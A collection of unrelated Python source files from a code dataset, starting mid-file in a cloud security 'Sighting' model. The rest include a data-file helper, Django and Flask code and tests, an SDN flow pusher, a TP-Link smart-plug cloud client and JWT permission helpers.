CONFIDENCE_HIGH = "HIGH"
#: A constant which can be used with the confidence property of a Sighting.
#: This constant has a value of "MEDIUM"
CONFIDENCE_MEDIUM = "MEDIUM"
#: A constant which can be used with the confidence property of a Sighting.
#: This constant has a value of "LOW"
CONFIDENCE_LOW = "LOW"
#: A constant which can be used with the confidence property of a Sighting.
#: This constant has a value of "MINOR"
CONFIDENCE_MINOR = "MINOR"
def __init__(self, **kwargs):
"""
Initializes a new Sighting object with values from keyword arguments.
The following keyword arguments are supported (corresponding to the getters/setters of this class):
:param id:
The value to assign to the id property of this Sighting.
:type id: str
:param description:
The value to assign to the description property of this Sighting.
:type description: str
:param problem_id:
The value to assign to the problem_id property of this Sighting.
:type problem_id: str
:param compartment_id:
The value to assign to the compartment_id property of this Sighting.
:type compartment_id: str
:param actor_principal_id:
The value to assign to the actor_principal_id property of this Sighting.
:type actor_principal_id: str
:param actor_principal_name:
The value to assign to the actor_principal_name property of this Sighting.
:type actor_principal_name: str
:param actor_principal_type:
The value to assign to the actor_principal_type property of this Sighting.
:type actor_principal_type: str
:param classification_status:
The value to assign to the classification_status property of this Sighting.
Allowed values for this property are: "FALSE_POSITIVE", "FALSE_NEGATIVE", "TRUE_POSITIVE", "TRUE_NEGATIVE", "NOT_CLASSIFIED", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:type classification_status: str
:param sighting_type:
The value to assign to the sighting_type property of this Sighting.
:type sighting_type: str
:param sighting_type_display_name:
The value to assign to the sighting_type_display_name property of this Sighting.
:type sighting_type_display_name: str
:param tactic_name:
The value to assign to the tactic_name property of this Sighting.
:type tactic_name: str
:param technique_name:
The value to assign to the technique_name property of this Sighting.
:type technique_name: str
:param sighting_score:
The value to assign to the sighting_score property of this Sighting.
:type sighting_score: int
:param severity:
The value to assign to the severity property of this Sighting.
Allowed values for this property are: "CRITICAL", "HIGH", "MEDIUM", "LOW", "MINOR", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:type severity: str
:param confidence:
The value to assign to the confidence property of this Sighting.
Allowed values for this property are: "CRITICAL", "HIGH", "MEDIUM", "LOW", "MINOR", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:type confidence: str
:param time_first_detected:
The value to assign to the time_first_detected property of this Sighting.
:type time_first_detected: datetime
:param time_last_detected:
The value to assign to the time_last_detected property of this Sighting.
:type time_last_detected: datetime
:param regions:
The value to assign to the regions property of this Sighting.
:type regions: list[str]
:param additional_details:
The value to assign to the additional_details property of this Sighting.
:type additional_details: dict(str, str)
"""
self.swagger_types = {
'id': 'str',
'description': 'str',
'problem_id': 'str',
'compartment_id': 'str',
'actor_principal_id': 'str',
'actor_principal_name': 'str',
'actor_principal_type': 'str',
'classification_status': 'str',
'sighting_type': 'str',
'sighting_type_display_name': 'str',
'tactic_name': 'str',
'technique_name': 'str',
'sighting_score': 'int',
'severity': 'str',
'confidence': 'str',
'time_first_detected': 'datetime',
'time_last_detected': 'datetime',
'regions': 'list[str]',
'additional_details': 'dict(str, str)'
}
self.attribute_map = {
'id': 'id',
'description': 'description',
'problem_id': 'problemId',
'compartment_id': 'compartmentId',
'actor_principal_id': 'actorPrincipalId',
'actor_principal_name': 'actorPrincipalName',
'actor_principal_type': 'actorPrincipalType',
'classification_status': 'classificationStatus',
'sighting_type': 'sightingType',
'sighting_type_display_name': 'sightingTypeDisplayName',
'tactic_name': 'tacticName',
'technique_name': 'techniqueName',
'sighting_score': 'sightingScore',
'severity': 'severity',
'confidence': 'confidence',
'time_first_detected': 'timeFirstDetected',
'time_last_detected': 'timeLastDetected',
'regions': 'regions',
'additional_details': 'additionalDetails'
}
self._id = None
self._description = None
self._problem_id = None
self._compartment_id = None
self._actor_principal_id = None
self._actor_principal_name = None
self._actor_principal_type = None
self._classification_status = None
self._sighting_type = None
self._sighting_type_display_name = None
self._tactic_name = None
self._technique_name = None
self._sighting_score = None
self._severity = None
self._confidence = None
self._time_first_detected = None
self._time_last_detected = None
self._regions = None
self._additional_details = None
@property
def id(self):
"""
**[Required]** Gets the id of this Sighting.
Unique identifier for sighting event
:return: The id of this Sighting.
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""
Sets the id of this Sighting.
Unique identifier for sighting event
:param id: The id of this Sighting.
:type: str
"""
self._id = id
@property
def description(self):
"""
**[Required]** Gets the description of this Sighting.
Description of the sighting event
:return: The description of this Sighting.
:rtype: str
"""
return self._description
@description.setter
def description(self, description):
"""
Sets the description of this Sighting.
Description of the sighting event
:param description: The description of this Sighting.
:type: str
"""
self._description = description
@property
def problem_id(self):
"""
Gets the problem_id of this Sighting.
Problem Id to which the Sighting is associated
:return: The problem_id of this Sighting.
:rtype: str
"""
return self._problem_id
@problem_id.setter
def problem_id(self, problem_id):
"""
Sets the problem_id of this Sighting.
Problem Id to which the Sighting is associated
:param problem_id: The problem_id of this Sighting.
:type: str
"""
self._problem_id = problem_id
@property
def compartment_id(self):
"""
**[Required]** Gets the compartment_id of this Sighting.
Compartment Id where the resource is created
:return: The compartment_id of this Sighting.
:rtype: str
"""
return self._compartment_id
@compartment_id.setter
def compartment_id(self, compartment_id):
"""
Sets the compartment_id of this Sighting.
Compartment Id where the resource is created
:param compartment_id: The compartment_id of this Sighting.
:type: str
"""
self._compartment_id = compartment_id
@property
def actor_principal_id(self):
"""
Gets the actor_principal_id of this Sighting.
Unique identifier for principal actor
:return: The actor_principal_id of this Sighting.
:rtype: str
"""
return self._actor_principal_id
@actor_principal_id.setter
def actor_principal_id(self, actor_principal_id):
"""
Sets the actor_principal_id of this Sighting.
Unique identifier for principal actor
:param actor_principal_id: The actor_principal_id of this Sighting.
:type: str
"""
self._actor_principal_id = actor_principal_id
@property
def actor_principal_name(self):
"""
Gets the actor_principal_name of this Sighting.
Name of the principal actor
:return: The actor_principal_name of this Sighting.
:rtype: str
"""
return self._actor_principal_name
@actor_principal_name.setter
def actor_principal_name(self, actor_principal_name):
"""
Sets the actor_principal_name of this Sighting.
Name of the principal actor
:param actor_principal_name: The actor_principal_name of this Sighting.
:type: str
"""
self._actor_principal_name = actor_principal_name
@property
def actor_principal_type(self):
"""
Gets the actor_principal_type of this Sighting.
Type of the principal actor
:return: The actor_principal_type of this Sighting.
:rtype: str
"""
return self._actor_principal_type
@actor_principal_type.setter
def actor_principal_type(self, actor_principal_type):
"""
Sets the actor_principal_type of this Sighting.
Type of the principal actor
:param actor_principal_type: The actor_principal_type of this Sighting.
:type: str
"""
self._actor_principal_type = actor_principal_type
@property
def classification_status(self):
"""
**[Required]** Gets the classification_status of this Sighting.
ClassificationStatus of the sighting event
Allowed values for this property are: "FALSE_POSITIVE", "FALSE_NEGATIVE", "TRUE_POSITIVE", "TRUE_NEGATIVE", "NOT_CLASSIFIED", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:return: The classification_status of this Sighting.
:rtype: str
"""
return self._classification_status
@classification_status.setter
def classification_status(self, classification_status):
"""
Sets the classification_status of this Sighting.
ClassificationStatus of the sighting event
:param classification_status: The classification_status of this Sighting.
:type: str
"""
allowed_values = ["FALSE_POSITIVE", "FALSE_NEGATIVE", "TRUE_POSITIVE", "TRUE_NEGATIVE", "NOT_CLASSIFIED"]
if not value_allowed_none_or_none_sentinel(classification_status, allowed_values):
classification_status = 'UNKNOWN_ENUM_VALUE'
self._classification_status = classification_status
@property
def sighting_type(self):
"""
**[Required]** Gets the sighting_type of this Sighting.
Identifier for the sighting type
:return: The sighting_type of this Sighting.
:rtype: str
"""
return self._sighting_type
@sighting_type.setter
def sighting_type(self, sighting_type):
"""
Sets the sighting_type of this Sighting.
Identifier for the sighting type
:param sighting_type: The sighting_type of this Sighting.
:type: str
"""
self._sighting_type = sighting_type
@property
def sighting_type_display_name(self):
"""
**[Required]** Gets the sighting_type_display_name of this Sighting.
Display name of the sighting type
:return: The sighting_type_display_name of this Sighting.
:rtype: str
"""
return self._sighting_type_display_name
@sighting_type_display_name.setter
def sighting_type_display_name(self, sighting_type_display_name):
"""
Sets the sighting_type_display_name of this Sighting.
Display name of the sighting type
:param sighting_type_display_name: The sighting_type_display_name of this Sighting.
:type: str
"""
self._sighting_type_display_name = sighting_type_display_name
@property
def tactic_name(self):
"""
**[Required]** Gets the tactic_name of this Sighting.
Name of the Mitre att&ck tactic
:return: The tactic_name of this Sighting.
:rtype: str
"""
return self._tactic_name
@tactic_name.setter
def tactic_name(self, tactic_name):
"""
Sets the tactic_name of this Sighting.
Name of the Mitre att&ck tactic
:param tactic_name: The tactic_name of this Sighting.
:type: str
"""
self._tactic_name = tactic_name
@property
def technique_name(self):
"""
**[Required]** Gets the technique_name of this Sighting.
Name of the Mitre att&ck technique
:return: The technique_name of this Sighting.
:rtype: str
"""
return self._technique_name
@technique_name.setter
def technique_name(self, technique_name):
"""
Sets the technique_name of this Sighting.
Name of the Mitre att&ck technique
:param technique_name: The technique_name of this Sighting.
:type: str
"""
self._technique_name = technique_name
@property
def sighting_score(self):
"""
**[Required]** Gets the sighting_score of this Sighting.
Score for the sighting
:return: The sighting_score of this Sighting.
:rtype: int
"""
return self._sighting_score
@sighting_score.setter
def sighting_score(self, sighting_score):
"""
Sets the sighting_score of this Sighting.
Score for the sighting
:param sighting_score: The sighting_score of this Sighting.
:type: int
"""
self._sighting_score = sighting_score
@property
def severity(self):
"""
**[Required]** Gets the severity of this Sighting.
Severity of the sighting
Allowed values for this property are: "CRITICAL", "HIGH", "MEDIUM", "LOW", "MINOR", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:return: The severity of this Sighting.
:rtype: str
"""
return self._severity
@severity.setter
def severity(self, severity):
"""
Sets the severity of this Sighting.
Severity of the sighting
:param severity: The severity of this Sighting.
:type: str
"""
allowed_values = ["CRITICAL", "HIGH", "MEDIUM", "LOW", "MINOR"]
if not value_allowed_none_or_none_sentinel(severity, allowed_values):
severity = 'UNKNOWN_ENUM_VALUE'
self._severity = severity
@property
def confidence(self):
"""
**[Required]** Gets the confidence of this Sighting.
Confidence of the sighting
Allowed values for this property are: "CRITICAL", "HIGH", "MEDIUM", "LOW", "MINOR", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:return: The confidence of this Sighting.
:rtype: str
"""
return self._confidence
@confidence.setter
def confidence(self, confidence):
"""
Sets the confidence of this Sighting.
Confidence of the sighting
:param confidence: The confidence of this Sighting.
:type: str
"""
allowed_values = ["CRITICAL", "HIGH", "MEDIUM", "LOW", "MINOR"]
if not value_allowed_none_or_none_sentinel(confidence, allowed_values):
confidence = 'UNKNOWN_ENUM_VALUE'
self._confidence = confidence
@property
def time_first_detected(self):
"""
**[Required]** Gets the time_first_detected of this Sighting.
The date and time the sighting was first detected. Format defined by RFC3339.
:return: The time_first_detected of this Sighting.
:rtype: datetime
"""
return self._time_first_detected
@time_first_detected.setter
def time_first_detected(self, time_first_detected):
"""
Sets the time_first_detected of this Sighting.
The date and time the sighting was first detected. Format defined by RFC3339.
:param time_first_detected: The time_first_detected of this Sighting.
:type: datetime
"""
self._time_first_detected = time_first_detected
@property
def time_last_detected(self):
"""
**[Required]** Gets the time_last_detected of this Sighting.
The date and time the sighting was last detected. Format defined by RFC3339.
:return: The time_last_detected of this Sighting.
:rtype: datetime
"""
return self._time_last_detected
@time_last_detected.setter
def time_last_detected(self, time_last_detected):
"""
Sets the time_last_detected of this Sighting.
The date and time the sighting was last detected. Format defined by RFC3339.
:param time_last_detected: The time_last_detected of this Sighting.
:type: datetime
"""
self._time_last_detected = time_last_detected
@property
def regions(self):
"""
**[Required]** Gets the regions of this Sighting.
regions involved in the sighting
:return: The regions of this Sighting.
:rtype: list[str]
"""
return self._regions
@regions.setter
def regions(self, regions):
"""
Sets the regions of this Sighting.
regions involved in the sighting
:param regions: The regions of this Sighting.
:type: list[str]
"""
self._regions = regions
@property
def additional_details(self):
"""
Gets the additional_details of this Sighting.
The additional details of the Sighting
:return: The additional_details of this Sighting.
:rtype: dict(str, str)
"""
return self._additional_details
@additional_details.setter
def additional_details(self, additional_details):
"""
Sets the additional_details of this Sighting.
The additional details of the Sighting
:param additional_details: The additional_details of this Sighting.
:type: dict(str, str)
"""
self._additional_details = additional_details
def __repr__(self):
return formatted_flat_dict(self)
def __eq__(self, other):
if other is None:
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
| StarcoderdataPython |
90108 | <reponame>Y-Kuro-u/chariot
import os
import mmap
from chariot.util import xtqdm
class DataFile():
def __init__(self, path, encoding="utf-8"):
self.path = path
self.encoding = encoding
file_name = os.path.basename(path)
base_name, ext = os.path.splitext(file_name)
self.base_name = base_name
self.ext = ext
def exists(self):
return os.path.exists(self.path)
def convert(self, data_dir_to="", add_attribute="",
attribute_to=(), ext_to=""):
_dir = os.path.dirname(self.path)
elements = self._elements()
ext = self.ext
if data_dir_to:
_dir = os.path.join(_dir, "../" + data_dir_to)
if add_attribute:
elements.append(add_attribute)
elif len(attribute_to) > 0:
# File name format is name + "__".join(attributes)
# So attribute is elements[1:]
for a in attribute_to:
if a in elements[1:]:
index = elements[1:].index(a)
elements[1 + index] = attribute_to[a]
if ext_to:
ext = ext_to
base_name = "__".join(elements)
new_path = os.path.join(_dir, base_name + ext)
return self.__class__(new_path)
@property
def name(self):
return self._elements[0]
@property
def attributes(self):
return self._elements[1:]
def _elements(self):
elements = self.base_name.split("__")
return elements
def get_line_count(self):
count = 0
with open(self.path, "r+") as f:
buf = mmap.mmap(f.fileno(), 0)
while buf.readline():
count += 1
return count
def fetch(self, progress=False):
total_count = 0
if progress:
total_count = self.get_line_count()
with open(self.path, encoding=self.encoding) as f:
iterator = f
if progress:
iterator = xtqdm(f, total=total_count)
for line in iterator:
yield line.strip()
def to_array(self):
lines = []
with open(self.path, encoding=self.encoding) as f:
lines = f.readlines()
lines = [ln.strip() for ln in lines]
return lines
| StarcoderdataPython |
1686876 | <filename>env/Lib/site-packages/anyio/_core/_signals.py
from typing import AsyncIterator
from ._compat import DeprecatedAsyncContextManager
from ._eventloop import get_asynclib
def open_signal_receiver(*signals: int) -> DeprecatedAsyncContextManager[AsyncIterator[int]]:
"""
Start receiving operating system signals.
:param signals: signals to receive (e.g. ``signal.SIGINT``)
:return: an asynchronous context manager for an asynchronous iterator which yields signal
numbers
.. warning:: Windows does not support signals natively so it is best to avoid relying on this
in cross-platform applications.
.. warning:: On asyncio, this permanently replaces any previous signal handler for the given
signals, as set via :meth:`~asyncio.loop.add_signal_handler`.
"""
return get_asynclib().open_signal_receiver(*signals)
| StarcoderdataPython |
1774235 | from django.contrib import admin
from .models import User
admin.site.register(User)
# admin.site.Register(User)
# Register your models here.
| StarcoderdataPython |
1663595 | <filename>scripts/flowpusher_demo.py
import httplib
import json
class StaticFlowPusher(object):
def __init__(self, server):
self.server = server
def get(self, data):
ret = self.rest_call({}, 'GET')
return json.loads(ret[2])
def set(self, data):
ret = self.rest_call(data, 'POST')
return ret[0] == 200
def remove(self, objtype, data):
ret = self.rest_call(data, 'DELETE')
return ret[0] == 200
def rest_call(self, data, action):
path = '/wm/staticflowentrypusher/json'
headers = {
'Content-type': 'application/json',
'Accept': 'application/json',
}
body = json.dumps(data)
conn = httplib.HTTPConnection(self.server, 8080)
conn.request(action, path, body, headers)
response = conn.getresponse()
ret = (response.status, response.reason, response.read())
print ret
conn.close()
return ret
pusher = StaticFlowPusher('172.16.31.10') #controller ip
flow1 = {
'switch':"00:00:00:00:00:00:00:01",
"name":"flow-mod-1",
"cookie":"0",
"priority":"32768",
"ingress-port":"1",
"active":"true",
"actions":"output=2"
}
flow2 = {
'switch':"00:00:00:00:00:00:00:01",
"name":"flow-mod-2",
"cookie":"0",
"priority":"32768",
"ingress-port":"2",
"active":"true",
"actions":"output=flood"
}
flow3 = {
'switch':"00:00:00:00:00:00:00:01",
"name":"flow-mod-3",
"cookie":"0",
"priority":"32768",
"ingress-port":"3",
"active":"true",
"actions":"output=flood"
}
#adding flow1,flow2,flow3
pusher.set(flow1)
pusher.set(flow2)
pusher.set(flow3)
| StarcoderdataPython |
3329030 | <gh_stars>0
from main import Link, Event
from . import BaseTest
class TestViewHandlers(BaseTest):
def test_index(self):
response = self.app.get('/')
assert 'Zongo' in response
def test_admin(self):
response = self.app.get('/admin')
assert response
def test_published_link(self):
url = "http://example.com"
Link(url=url, published=True).put()
assert url in self.app.get('/')
def test_atom_feed(self):
location = 'Somewhere'
Event(title='foo', date=self.str2date('2009-01-01'), location=location, published=True).put()
response = self.app.get('/events/atom')
assert '/events/01-01-2009_foo' in response
def test_not_published_link(self):
url = "http://example.com"
Link(url=url).put()
assert url not in self.app.get('/')
assert url in self.app.get('/admin/links')
def test_published_event(self):
location = 'Somewhere'
Event(title='foo', date=self.str2date('2009-01-01'), location=location, published=True).put()
response = self.app.get('/')
assert location in response
def test_not_published_event(self):
location = 'Somewhere'
Event(title='foo', date=self.str2date('2009-01-01'), location=location).put()
assert location not in self.app.get('/')
assert location in self.app.get('/admin/events')
def test_missing_event_page(self):
response = self.app.get('/events/missingapsdjhfaljsk', status=404)
def test_event_page(self):
location = 'Somewhere'
title = "This+is*a;weird Title"
event = Event(title=title, date=self.str2date('2009-01-31'), location=location,
published=True)
event.put()
slug = "31-01-2009_this-is-a-weird-title"
self.assertEqual(event.slug, slug)
response = self.app.get('/events/%s' % slug)
assert location in response, location + ' should be in ' + response.body
def test_photo_page_should_have_links(self):
url = "http://example.com"
link = Link(url=url, published=True)
link.put()
response = self.app.get('/photos/')
assert url in response, url + " not found in " + str(response)
class TestAdminHandlers(BaseTest):
def test_create_event(self):
form = self.app.get('/admin/events/new').form
form['title'] = 'This is a test event'
form['date'] = '25/01/2000'
form['image'] = ('cows.jpg', open('tests/small_cows.jpg').read())
form['description'] = 'great event'
form['location'] = 'Tokyo'
response = form.submit()
event = Event.gql("WHERE title = :1", 'This is a test event').get()
self.assertEqual(event.description, 'great event')
self.assertEqual(event.location, 'Tokyo')
self.assertEqual(event.date.day, 25)
assert event.image
| StarcoderdataPython |
1735515 | <filename>Python3/Coursera/others/use_fork_2.py
# Память родительского и дочернего процесса
import os
import time
foo = "bar"
if os.fork() == 0:
# дочерний процесс
foo = "baz"
print("child:", foo)
else:
# родительский процесс
time.sleep(2)
print("parent:", foo)
os.wait()
| StarcoderdataPython |
4837779 | <reponame>jttaylor/TPLink-SmartPlug
import json
import urllib2
import uuid
class SmartPlug:
def __init__(self, username, password):
self.username = username
self.password = password
self.token = None
self.tp_uuid = str(uuid.uuid4())
self.login_req = {
"method": "login",
"params": {
"appType": "Kasa_Android",
"cloudUserName": self.username,
"cloudPassword": <PASSWORD>,
"terminalUUID": self.tp_uuid
}
}
def GetToken(self):
try:
req = urllib2.Request('https://wap.tplinkcloud.com')
req.add_header('Content-Type', 'application/json')
response = urllib2.urlopen(req, json.dumps(self.login_req))
txt = response.read()
jobj = json.loads(txt)
self.token = jobj["result"]["token"]
except:
return
def PrintDevices(self):
try:
if self.token is None:
self.GetToken()
getDeviceList_req = {"method": "getDeviceList" }
url = 'https://wap.tplinkcloud.com?token=' + self.token
req = urllib2.Request(url)
req.add_header('Content-Type', 'application/json')
response = urllib2.urlopen(req, json.dumps(getDeviceList_req))
print response.read()
except:
return
def GetState(self, device_id):
try:
if self.token is None:
self.GetToken()
status_req = {"method":"passthrough", "params": {"deviceId": device_id, "requestData": "{\"system\":{\"get_sysinfo\":{}}}" }}
url = 'https://wap.tplinkcloud.com?token=' + self.token
req = urllib2.Request(url)
req.add_header('Content-Type', 'application/json')
response = urllib2.urlopen(req, json.dumps(status_req))
txt = response.read()
jobj = json.loads(txt)
txt2 = jobj["result"]["responseData"]
jobj2 = json.loads(txt2)
return jobj2["system"]["get_sysinfo"]["relay_state"]
except:
return 0
def TurnOn(self, device_id):
try:
if self.token is None:
self.GetToken()
turnOn_req = {"method":"passthrough", "params": {"deviceId": device_id, "requestData": "{\"system\":{\"set_relay_state\":{\"state\":1}}}" }}
url = 'https://wap.tplinkcloud.com?token=' + self.token
req = urllib2.Request(url)
req.add_header('Content-Type', 'application/json')
response = urllib2.urlopen(req, json.dumps(turnOn_req))
except:
return
def TurnOff(self, device_id):
try:
if self.token is None:
self.GetToken()
turnOff_req = {"method":"passthrough", "params": {"deviceId": device_id, "requestData": "{\"system\":{\"set_relay_state\":{\"state\":0}}}" }}
url = 'https://wap.tplinkcloud.com?token=' + self.token
req = urllib2.Request(url)
req.add_header('Content-Type', 'application/json')
response = urllib2.urlopen(req, json.dumps(turnOff_req))
except:
return | StarcoderdataPython |
74758 | <reponame>arryaaas/Met-Num<gh_stars>0
from app import app
import os
if __name__ == "__main__":
port = int(os.environ.get("PORT", 5000))
app.run(debug=True, port=port) | StarcoderdataPython |
1756899 | <gh_stars>1000+
# -*- coding: utf-8 -*-
"""Top-level package for Lambda Python Powertools."""
from .logging import Logger # noqa: F401
from .metrics import Metrics, single_metric # noqa: F401
from .package_logger import set_package_logger_handler
from .tracing import Tracer # noqa: F401
__author__ = """Amazon Web Services"""
set_package_logger_handler()
| StarcoderdataPython |
1773245 | <reponame>pavoljuhas/diffpy.Structure
#!/usr/bin/env python
##############################################################################
#
# diffpy.structure by DANSE Diffraction group
# <NAME>
# (c) 2006 trustees of the Michigan State University.
# All rights reserved.
#
# File coded by: <NAME>
#
# See AUTHORS.txt for a list of people who contributed.
# See LICENSE_DANSE.txt for license information.
#
##############################################################################
"""Exceptions used in Structure package.
"""
class StructureFormatError(Exception):
"""Exception for failed IO from Structure file
"""
pass
class LatticeError(Exception):
"""Exception for impossible lattice parameters.
"""
pass
class SymmetryError(Exception):
"""Exception raised for invalid symmetry operations.
"""
pass
| StarcoderdataPython |
3363210 | mail_address = "<EMAIL>"
passplain = "<PASSWORD>"
passtwt = "<PASSWORD>"
passgoog = "<PASSWORD>" | StarcoderdataPython |
3309203 | <gh_stars>1-10
"""Convolutional Neural Network.
"""
from tensorflow.keras.layers import Conv2D, Dense, Flatten, MaxPool2D
import dualing.utils.logging as l
from dualing.core import Base
logger = l.get_logger(__name__)
class CNN(Base):
"""A CNN class stands for a standard Convolutional Neural Network implementation.
"""
def __init__(self, n_blocks=3, init_kernel=5, n_output=128, activation='sigmoid'):
"""Initialization method.
Args:
n_blocks (int): Number of convolutional/pooling blocks.
init_kernel (int): Size of initial kernel.
n_outputs (int): Number of output units.
activation (str): Output activation function.
"""
logger.info('Overriding class: Base -> CNN.')
super(CNN, self).__init__(name='cnn')
# Asserting that it will be possible to create the convolutional layers
assert init_kernel - 2 * (n_blocks - 1) >= 1
# Convolutional layers
self.conv = [Conv2D(32 * (2 ** i), init_kernel - 2 * i, activation='relu', padding='same')
for i in range(n_blocks)]
# Pooling layers
self.pool = [MaxPool2D() for _ in range(n_blocks)]
# Flatenning layer
self.flatten = Flatten()
# Final fully-connected layer
self.fc = Dense(n_output, activation=activation)
logger.info('Class overrided.')
logger.debug('Blocks: %d | Initial Kernel: %d | Output (%s): %d.', n_blocks, init_kernel, activation, n_output)
def call(self, x):
"""Method that holds vital information whenever this class is called.
Args:
x (tf.Tensor): Tensor containing the input sample.
Returns:
The layer's outputs.
"""
# Iterate through convolutional and poooling layers
for (conv, pool) in zip(self.conv, self.pool):
# Pass through convolutional layer
x = conv(x)
# Pass through pooling layer
x = pool(x)
# Flattens the outputs
x = self.flatten(x)
# Pass through the fully-connected layer
x = self.fc(x)
return x
| StarcoderdataPython |
73087 | <reponame>penguinwang96825/Intelligent-Asset-Allocation<filename>model/markowitz.py<gh_stars>1-10
from database.database import db
from database.tables.price import StockPrice
from tqdm import tqdm
import datetime as dt
import numpy as np
import pandas as pd
import scipy
from pandas_datareader import data
class Markowitz(object):
def __init__(self, selected_tickers):
self.selected_tickers = selected_tickers
def read_stock_file(self, tick):
# Use the Flask-SQLAlchemy to query our data from database
stock_data = StockPrice.find_all_by_query(comp=tick)
date_ = []
high = []
low = []
open_ = []
adj_close = []
vol = []
# Store/Split the data into train & test dataframe
for row in stock_data:
date = dt.datetime.strptime(str(row.date), '%Y-%m-%d')
date_.append(date)
high.append(row.high)
low.append(row.low)
open_.append(row.open_)
adj_close.append(row.adj_close)
vol.append(row.vol)
df = pd.DataFrame({
'date': date_,
'high': high,
'low': low,
'open': open_,
'adj_close': adj_close,
'vol': vol
})
df.set_index('date', inplace=True)
# split dataframe into train & test part
train_df, test_df = df['2012-01-01': '2016-12-31'], df['2017-01-01': '2020-06-30']
self.test_df = test_df
return train_df, test_df
def prepare_input(self):
# 1. Collect user selected tickers' stock price
all_data_df = pd.DataFrame({})
time_step = 180
for ticker in self.selected_tickers:
train_df, test_df = self.read_stock_file(ticker)
# axis=0 -> combine vertically
dataset_total = pd.concat([train_df, test_df], axis=0)
inputs = dataset_total[len(dataset_total)-len(test_df)-time_step:]['adj_close']
all_data_df[ticker] = inputs
# 2. Prepare main markowitz inputs
# 2-1. price_df -> price_list
prices_list = []
for i in range(time_step, len(all_data_df)):
price_t = all_data_df[i-time_step:i].T
prices_list.append(price_t)
# 2-2. get market capitalization
end = dt.datetime(2016, 12, 31)
market_caps = list(data.get_quote_yahoo(self.selected_tickers, end)['marketCap'])
return prices_list, market_caps
def assets_historical_returns_covariances(self, prices_list):
all_exp_returns = []
all_covars = []
for prices in prices_list:
prices = np.array(prices)
rows, cols = prices.shape
returns = np.empty([rows, cols - 1])
for r in range(rows):
for c in range(cols-1):
p0, p1 = prices[r, c], prices[r, c+1]
returns[r, c] = (p1/p0) - 1
# calculate returns
exp_returns = np.array([])
for r in range(rows):
exp_returns = np.append(exp_returns, np.mean(returns[r]))
# calculate covariances
covars = np.cov(returns)
# annualize returns, covariances
exp_returns = (1 + exp_returns) ** (365.25) - 1
covars = covars * (365.25)
all_exp_returns.append(exp_returns)
all_covars.append(covars)
return all_exp_returns, all_covars
def portfolioMean(self, W, R):
return sum(R * W)
def portfolioVar(self, W, C):
return np.dot(np.dot(W, C), W)
def portfolioMeanVar(self, W, R, C):
return self.portfolioMean(W, R), self.portfolioVar(W, C)
def solve_weights(self, R, C, rf):
def fitness(W, R, C, rf):
mean, var = self.portfolioMeanVar(W, R, C)
sharp_ratio = (mean - rf) / np.sqrt(var) # sharp ratio
return 1 / sharp_ratio
n = len(R)
W = np.ones([n]) / n
b_ = [(0., 1.) for i in range(n)]
c_ = ({'type': 'eq', 'fun': lambda W: sum(W) - 1.})
optimized = scipy.optimize.minimize(fitness, W, (R, C, rf), method='SLSQP', constraints=c_, bounds=b_)
return optimized.x
def get_all_weights(self):
prices_list, _ = self.prepare_input()
all_R, all_C = self.assets_historical_returns_covariances(prices_list)
all_weights = []
length = len(all_R)
rf = 0.015
for i in tqdm(range(length)):
weight = list(self.solve_weights(all_R[i], all_C[i], rf))
all_weights.append(weight)
self.weights = all_weights
weights = np.clip(np.around(np.array(all_weights) * 100, 2), 0, 100)
transposed_weights = weights.transpose().tolist()
return transposed_weights
def get_backtest_result(self):
# get testing section stock price data
log_return_df = pd.DataFrame({})
prices_dict = {}
for ticker in self.selected_tickers:
_, test_df = self.read_stock_file(ticker)
# add log return col for calculate the performance
price = test_df['adj_close']
prices_dict[ticker] = price.values.tolist()
log_return = np.log(price) - np.log(price.shift(1))
log_return_df = pd.concat([log_return_df, log_return], axis=1)
log_return_df = log_return_df.iloc[1:, :]
log_return_df.columns = self.selected_tickers
# calculate the whole portfolio performance
length = len(log_return_df)
total_value = 1
all_values = []
all_return = []
for i in range(length):
portfolio_weights = self.weights[i]
returns = log_return_df.iloc[i, :].values
portfolio_return = sum(portfolio_weights * returns)
total_value = total_value * (1+portfolio_return)
all_values.append(total_value)
all_return.append(portfolio_return)
date = self.test_df.reset_index()['date']
date = date.dt.strftime('%Y-%m-%d')
date = date.values[1:]
return date, all_values, prices_dict | StarcoderdataPython |
94746 | <gh_stars>1-10
import datetime
# Django imports
from django.contrib.auth.models import Group
from rest_framework import permissions
# Local imports
from config.settings import JWT_AUTH
# Create your views here.
def jwt_payload_handler(user):
"""Defines payload to be stored in JWT passed to the client.
"""
return {
'user_id': user.id,
'email': user.email,
'username': user.get_username(),
'groups' : list(user.groups.all().values_list('name', flat=True)),
'exp': datetime.datetime.utcnow() + JWT_AUTH['JWT_EXPIRATION_DELTA'], }
def is_in_group(user, group_name):
"""Takes a user and a group name, and returns `True` if the user is in that group.
"""
return Group.objects.get(name=group_name).user_set.filter(id=user.id).exists()
class HasGroupPermission(permissions.BasePermission):
"""Ensure user is in required groups.
"""
def has_permission(self, request, view):
# Get a mapping of methods -> required group.
required_groups_mapping = getattr(view, 'required_groups', {})
# Determine the required groups for this particular request method.
required_groups = required_groups_mapping.get(request.method, [])
# Return True if the user has all the required groups.
return all([is_in_group(request.user, group_name) for group_name in required_groups])
| StarcoderdataPython |
3209228 | import sqlalchemy
from flask_taxonomies.constants import INCLUDE_DELETED, INCLUDE_DESCENDANTS, \
INCLUDE_DESCENDANTS_COUNT, INCLUDE_STATUS, INCLUDE_SELF
from flask_taxonomies.models import TaxonomyTerm, TermStatusEnum, Representation
from flask_taxonomies.proxies import current_flask_taxonomies
from flask_taxonomies.term_identification import TermIdentification
from flask_taxonomies.views.common import build_descendants
from flask_taxonomies.views.paginator import Paginator
from flask import current_app
def get_taxonomy_json(code=None,
slug=None,
prefer: Representation = Representation("taxonomy"),
page=None,
size=None,
status_code=200,
q=None,
request=None):
taxonomy = current_flask_taxonomies.get_taxonomy(code)
